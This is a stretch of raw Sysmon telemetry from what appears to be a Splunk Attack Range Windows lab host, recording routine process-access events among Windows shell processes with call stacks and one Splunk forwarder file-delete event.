21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149629Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4f255|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x8000000000000000149628Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4f255|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 23542300x8000000000000000149627Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1BBDF3ECB1D66F837945A151FED5A9,SHA256=0E231510384D3A6DE55488A987B9DF6D9DD492A0A513E77CD6D11311B879037F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149626Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+4f255|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x8000000000000000149625Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.667{39BD8DE3-0FD9-60CA-8400-00000000D101}37201624C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149624Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.651{39BD8DE3-0FD9-60CA-8400-00000000D101}37206608C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149623Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.645{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+51d19|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149622Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.630{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+182c9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+51d19|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149621Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.630{39BD8DE3-0FD9-60CA-8400-00000000D101}37206492C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+18280|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+51d19|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000149620Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.616{39BD8DE3-0FD9-60CA-8400-00000000D101}37206608C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149619Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.598{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+83c5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b9c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149618Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.598{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7b3b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149617Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.598{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8749|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ae6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149616Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149615Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149614Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149613Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149612Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8500-00000000D101}32645948C:\Windows\system32\sihost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149611Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8500-00000000D101}32645948C:\Windows\system32\sihost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149610Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.582{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+ace56|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149609Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 